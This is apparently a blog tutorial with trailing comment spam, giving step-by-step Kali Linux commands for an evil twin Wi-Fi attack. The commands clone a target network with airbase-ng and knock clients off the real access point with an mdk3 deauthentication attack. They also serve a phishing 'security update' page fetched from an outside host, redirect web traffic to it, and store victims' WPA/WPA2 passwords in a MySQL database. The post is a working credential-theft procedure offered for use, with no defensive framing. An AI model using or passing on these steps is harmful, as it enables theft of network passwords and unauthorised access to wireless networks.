What is Evil twin access point:-
An evil twin, in security, is a rogue wireless access point that act as a Wi-Fi access point so that an attacker can gather personal information without the user's knowledge.To the user, the evil twin looks like a hot-spot with a strong signal; that's because the attacker has not only used the same network name and settings as the "good twin" he is impersonating, he has also physically positioned himself near the end-user so that his signal is likely to be the strongest within range.If the end-user is tempted by the strong signal and connects manually to the evil twin to access the Internet, or if the user's computer automatically chooses that connection because it is running in promiscuous mode, the evil twin becomes the user's Internet access point, giving the attacker the ability to intercept sensitive data such as passwords.
Requirements:
1. Linux(kali)
2. Wireless network adapter
3. Internet connection to your system
4. Target Access point
1.Open the terminal and type apt-get install dhcp3-server as show below: 2.Open your terminal and type nano/etc/dhcpd.conf, you should have a blank file opened up on your terminal.. 3.Now download the security update page which the client will see when they open up the web browser..
To do that,
Navigate to, cd /var/www in your terminal and do as follows:
rm index.html
wget http://hackthistv.com/eviltwin.zip
unzip eviltwin.zip
rm eviltwin.zip 4.Now type the following to start your apache server and mysql:
/etc/init.d/apache2 start
/etc/init.d/mysql start Now the mysql is loaded now we have to create a database where we store the WPA/WPA2 password that the client enters into the security update page..
Type the follows:
mysql -u root
create database evil_twin;
use evil_twin
now leave the terminal 5.Now we need to find our local network adapter interface name and our local ip
Now open the new terminal and type:
ip route (take note of local ip n wired interface)
airmon-ng
airmon-ng start wlan0
clear 6. airodump-ng-oui-update
7. airodump-ng -M mon0 (take note of target essid,bssid and channel number)
airbase-ng -e [ESSID] -c [ch. #] -P mon0
NOTE: [ESSID] is your targets ESSID and [ch. #] targets channel no.
8 Now open a new terminal and type as follows:
ifconfig at0 192.168.1.129 netmask 255.255.255.128
9 type the following:
route add -net 192.168.1.128 netmask 255.255.255.128 gw 192.168.1.129
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables –table nat –append POSTROUTING –out-interface eth0 -j MASQUERADE
iptables –append FORWARD –in-interface at0 -j ACCEPT
iptables -t nat -A PREROUTING -p tcp –dport 80 -j DNAT –to-destination [LOCALIP ADDRESS:80]
iptables -t nat -A POSTROUTING -j MASQUERADE
dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0
etc/init.d/isc-dhcp-server start
10 Now we need to force our clients to connect to our evil twin access point and to accomplish this we need to disconnect the clients by performing the de-authentication attack.
echo [BSSID] > blacklist
NOTE:[BSSID] BSSID of the target
mdk3 mon0 d -b blacklist -c [CH.#]
11 Now go back to airbase terminal to check if any client has connected to your evil twin access point..
12 Now go over to the mysql terminal and type
use evil_twin
select * from wpa_keys; {To view the password entered by the victim in our mysql database}
Here Is A Colletion Of Huge Programs, Download Free Software, Books,Project Etc.You Also Can Learn C, C++, Java ,ASP.Net And Blog & Website Designing http://www.programmingwithbasics.com
ReplyDeleteMost common mistakes in web Development
ReplyDelete